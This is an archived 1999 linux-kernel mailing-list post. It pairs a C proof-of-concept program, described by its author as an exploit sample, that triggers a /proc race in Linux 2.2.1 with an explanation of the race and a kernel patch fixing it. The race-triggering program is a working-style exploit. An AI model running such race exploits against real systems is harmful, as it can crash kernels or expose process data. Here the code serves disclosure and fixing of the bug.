[ http://www.rootshell.com/ ] Date: Tue, 2 Feb 1999 17:39:13 +0100 From: Andrea Arcangeli Subject: [patch] /proc race fixes for 2.2.1 (fwd) /* * Copyright (C) 1999 Andrea Arcangeli * Linux-2.2.1 /proc SMP race sniffer */ #include #include #include #include static volatile int pid = -1; static int prog_length; static pthread_mutex_t pid_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t zombie_lock = PTHREAD_MUTEX_INITIALIZER; static int get_current_pid(void) { int __pid; pthread_mutex_lock(&pid_lock); __pid = pid; pthread_mutex_unlock(&pid_lock); return __pid; } static void * sniffer(void *dummy) { int cache_pid = -1, fd = -1; char str[50], buf[2000], sample[2000]; pthread_mutex_lock(&zombie_lock); pthread_mutex_unlock(&zombie_lock); for (;;) { int length_cmp; if (get_current_pid() != cache_pid) { pthread_mutex_lock(&zombie_lock); cache_pid = pid; snprintf(str, 50, "/proc/%d/stat", cache_pid); if (fd > 0) close(fd); fd = open(str, O_RDONLY|O_NONBLOCK); if (fd > 0) { int length; length = read(fd, &buf, 2000); if (length > 0) { length_cmp = length; memcpy(sample, buf, length); sample[length-1] = 0; } } pthread_mutex_unlock(&zombie_lock); } if (fd > 0) { int length; lseek(fd, 0, SEEK_SET); length = read(fd, &buf, 200); buf[length-1] = 0; if (length >= length_cmp && memcmp(buf, sample, length_cmp)) printf("length %d, pid %d\n" "original data: %s\n" "modifyed data: %s\n", length, cache_pid, sample, buf); } } } static int is_zombie(int __pid) { char str[50], state; FILE * status; snprintf(str, 50, "/proc/%d/status", __pid); status = fopen(str, "r"); if (!status) { perror("open"); exit(2); } fscanf(status, "%*s\t%*s\nState:\t%c", &state); fclose(status); if (state != 'Z') return 0; return 1; } int main(int argc, char *argv[]) { int dummy; pthread_t task_struct_sniffer; pthread_mutex_lock(&zombie_lock); if (pthread_create(&task_struct_sniffer, NULL, sniffer, NULL)) { perror("pthread_create"); exit(1); } for (;;) { int __pid = fork(); if (!__pid) _exit(0); while (!is_zombie(__pid)); pthread_mutex_lock(&pid_lock); pid = __pid; pthread_mutex_unlock(&pid_lock); pthread_mutex_unlock(&zombie_lock); usleep(1); wait(&dummy); pthread_mutex_lock(&zombie_lock); } pthread_mutex_unlock(&zombie_lock); } Probably it has also bugs (since I have no chance to make it working here I am not going to look at it further), I attached it here only in the case someone is interested on a exploit sample. BTW, is there a better way to know when the child is become a zombie than reading /proc/pidofchild/status ? I thought to catch the SIGCHILD signal but as first I was not sure that this way a wait() would be wakenup anyway (too lazy to check in signal.c ;), and as second with the /proc/xxx/status approch I had to write less code anyway and since it was a not performance critical piece of code I had no dubit of the way to take ;). I also understood very well the reason of the 2.2.0 oopses and process in D state. It was happening something like this: `ps` tsk ------------- ----------------- sys_read() lock_kernel() do_page_fault() array_read() down(tsk->mm) find_vma() get_process_array() handle_mm_fault() lock_kernel() /* woowoo so spin on the big kernel lock */ get_stat() grab_task() down(tsk->mm) /* just owned by tsk */ schedule() /* so release the big kernel lock */ tsk gets the big kernel lock here finish the page fault __up() wake_up_process(`ps`) many othe thing execve() /* this is the harming */ mmput(tsk->mm); tsk->mm = mm_alloc(); (mm->count = 1) finish execve... .... everything he wants .... now `ps` get rescheduled and own the mm->semaphore (of a mm_struct that is not tsk->mm anymore) release_task(tsk); mmput(tsk->mm); (but mm->count was 1!!) exit_mmap(); zap_page_range() /* aieee! */ at the first fault it will get a mm = &init_mm !! Thinks like this can't happens in 2.2.0-pre9 just because tsk->mm was still referencing the old mm of the process (before the execve) because tsk->mm was a copy and not a runtime value. Obviously there was the stack overflow and performances problem in the (1) copy approch. So now I fixed all races with a zerocopy approch (originally suggested by Linus that increments the page count of the process stack instead of doing the copy, but it also assure that array.c always use the mm it has get before (with mmget())). Works fine here. Patch against 2.2.1: --- /tmp/array.c Tue Feb 2 00:08:07 1999 +++ linux/fs/proc/array.c Mon Feb 1 23:51:51 1999 @@ -389 +390,30 @@ -static unsigned long get_phys_addr(struct task_struct * p, unsigned long ptr) +/* + * Caller must release_mm the mm_struct later. + * You don't get any access to init_mm. + */ +static struct mm_struct * grab_mm(int pid) +{ + struct mm_struct * mm = NULL; + struct task_struct * tsk; + + read_lock(&tasklist_lock); + tsk = find_task_by_pid(pid); + /* + * NOTE: this doesn't race because we are protected by the + * big kernel lock. -arca + */ + if (tsk && tsk->mm && tsk->mm != &init_mm) + mmget(mm = tsk->mm); + read_unlock(&tasklist_lock); + if (mm) + down(&mm->mmap_sem); + return mm; +} + +static void release_mm(struct mm_struct *mm) +{ + up(&mm->mmap_sem); + mmput(mm); +} + +static unsigned long get_phys_addr(struct mm_struct *mm, unsigned long ptr) @@ -395 +425 @@ - if (!p || !p->mm || ptr >= TASK_SIZE) + if (ptr >= TASK_SIZE) @@ -398,2 +428,2 @@ - if (!p->mm->pgd) { - printk("get_phys_addr: pid %d has NULL pgd!\n", p->pid); + if (!mm->pgd) { + printk(KERN_DEBUG "missing pgd for mm %p\n", mm); @@ -403 +433 @@ - page_dir = pgd_offset(p->mm,ptr); + page_dir = pgd_offset(mm,ptr); @@ -425 +455 @@ -static int get_array(struct task_struct *p, unsigned long start, unsigned long end, char * buffer) +static int get_array(struct mm_struct *mm, unsigned long start, unsigned long end, char * buffer) @@ -434 +464 @@ - addr = get_phys_addr(p, start); + addr = get_phys_addr(mm, start); @@ -456,5 +486,2 @@ - struct task_struct *p; - - read_lock(&tasklist_lock); - p = find_task_by_pid(pid); - read_unlock(&tasklist_lock); /* FIXME!! This should be done after the last use */ + struct mm_struct *mm; + int res = 0; @@ -462,3 +489,6 @@ - if (!p || !p->mm) - return 0; - return get_array(p, p->mm->env_start, p->mm->env_end, buffer); + mm = grab_mm(pid); + if (mm) { + res = get_array(mm, mm->env_start, mm->env_end, buffer); + release_mm(mm); + } + return res; @@ -469 +499,2 @@ - struct task_struct *p; + struct mm_struct *mm; + int res = 0; @@ -471,6 +502,6 @@ - read_lock(&tasklist_lock); - p = find_task_by_pid(pid); - read_unlock(&tasklist_lock); /* FIXME!! This should be done after the last use */ - if (!p || !p->mm) - return 0; - return get_array(p, p->mm->arg_start, p->mm->arg_end, buffer); + mm = grab_mm(pid); + if (mm) { + res = get_array(mm, mm->arg_start, mm->arg_end, buffer); + release_mm(mm); + } + return res; @@ -725 +707 @@ -static inline char * task_mem(struct task_struct *p, char *buffer) +static inline char * task_mem(struct mm_struct * mm, char *buffer) @@ -727,4 +709,2 @@ - struct mm_struct * mm = p->mm; - - if (mm && mm != &init_mm) { - struct vm_area_struct * vma = mm->mmap; + if (mm) { + struct vm_area_struct * vma; @@ -819,0 +800,39 @@ +static struct task_struct *grab_task(int pid, struct mm_struct ** mm) +{ + struct task_struct *tsk = current; + + *mm = NULL; + read_lock(&tasklist_lock); + tsk = find_task_by_pid(pid); + if (tsk) + { + struct mm_struct * __mm; + struct page * page = mem_map + MAP_NR(tsk); + atomic_inc(&page->count); + /* + * NOTE: this doesn't race because we are protected + * by the big kernel lock. -arca + */ + __mm = tsk->mm; + if (__mm && __mm != &init_mm) + { + mmget(__mm); + *mm = __mm; + } + } + read_unlock(&tasklist_lock); + if (*mm) + down(&(*mm)->mmap_sem); + + return tsk; +} + +static void release_task(struct task_struct *tsk, struct mm_struct * mm) +{ + if (mm) + { + up(&mm->mmap_sem); + mmput(mm); + } + free_pages((unsigned long) tsk, 1); +} @@ -825,4 +844,3 @@ - - read_lock(&tasklist_lock); - tsk = find_task_by_pid(pid); - read_unlock(&tasklist_lock); /* FIXME!! This should be done after the last use */ + struct mm_struct * mm; + + tsk = grab_task(pid, &mm); @@ -833 +851 @@ - buffer = task_mem(tsk, buffer); + buffer = task_mem(mm, buffer); @@ -835,0 +854 @@ + release_task(tsk, mm); @@ -841,0 +861 @@ + struct mm_struct * mm; @@ -846,0 +867 @@ + int res; @@ -848,3 +869 @@ - read_lock(&tasklist_lock); - tsk = find_task_by_pid(pid); - read_unlock(&tasklist_lock); /* FIXME!! This should be done after the last use */ + tsk = grab_task(pid, &mm); @@ -855,3 +874,4 @@ - if (tsk->mm && tsk->mm != &init_mm) { - struct vm_area_struct *vma = tsk->mm->mmap; - while (vma) { + if (mm) { + struct vm_area_struct *vma; + + for (vma = mm->mmap; vma; vma = vma->vm_next) { @@ -859 +878,0 @@ - vma = vma->vm_next; @@ -860,0 +880 @@ + @@ -881 +901 @@ - return sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \ + res = sprintf(buffer,"%d (%s) %c %d %d %d %d %d %lu %lu \ @@ -907 +927 @@ - tsk->mm ? tsk->mm->rss : 0, /* you might want to shift this left 3 */ + mm ? mm->rss : 0, /* you might want to shift this left 3 */ @@ -909,3 +929,3 @@ - tsk->mm ? tsk->mm->start_code : 0, - tsk->mm ? tsk->mm->end_code : 0, - tsk->mm ? tsk->mm->start_stack : 0, + mm ? mm->start_code : 0, + mm ? mm->end_code : 0, + mm ? mm->start_stack : 0, @@ -925,0 +946,3 @@ + + release_task(tsk, mm); + return res; @@ -1003 +1025,0 @@ - struct task_struct *tsk; @@ -1004,0 +1027 @@ + struct mm_struct *mm; @@ -1006,7 +1029,3 @@ - read_lock(&tasklist_lock); - tsk = find_task_by_pid(pid); - read_unlock(&tasklist_lock); /* FIXME!! This should be done after the last use */ - if (!tsk) - return 0; - if (tsk->mm && tsk->mm != &init_mm) { - struct vm_area_struct * vma = tsk->mm->mmap; + mm = grab_mm(pid); + if (mm) { + struct vm_area_struct * vma = mm->mmap; @@ -1015 +1034 @@ - pgd_t *pgd = pgd_offset(tsk->mm, vma->vm_start); + pgd_t *pgd = pgd_offset(mm, vma->vm_start); @@ -1032,0 +1052 @@ + release_mm(mm); @@ -1070 +1089,0 @@ - @@ -1074 +1093,2 @@ - struct task_struct *p; + struct task_struct * p; + struct mm_struct * mm; @@ -1079 +1098,0 @@ - int volatile_task; @@ -1091,3 +1110 @@ - read_lock(&tasklist_lock); - p = find_task_by_pid(pid); - read_unlock(&tasklist_lock); /* FIXME!! This should be done after the last use */ + p = grab_task(pid, &mm); @@ -1097 +1114 @@ - if (!p->mm || p->mm == &init_mm || count == 0) + if (!mm || count == 0) @@ -1100,3 +1116,0 @@ - /* Check whether the mmaps could change if we sleep */ - volatile_task = (p != current || atomic_read(&p->mm->count) > 1); - @@ -1108 +1122 @@ - for (map = p->mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++) + for (map = mm->mmap, i = 0; map && (i < lineno); map = map->vm_next, i++) @@ -1179,6 +1192,0 @@ - - /* By writing to user space, we might have slept. - * Stop the loop, to avoid a race condition. - */ - if (volatile_task) - break; @@ -1190,0 +1199 @@ + release_task(p, mm); @@ -1202 +1211,2 @@ - struct task_struct * tsk = current ; + struct task_struct * tsk; + struct mm_struct * mm; @@ -1205,6 +1215,2 @@ - read_lock(&tasklist_lock); - if (pid != tsk->pid) - tsk = find_task_by_pid(pid); - read_unlock(&tasklist_lock); /* FIXME!! This should be done after the last use */ - - if (tsk == NULL) + tsk = grab_task(pid, &mm); + if (!tsk) @@ -1223,0 +1230 @@ + release_task(tsk, mm); Andrea Arcangeli - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/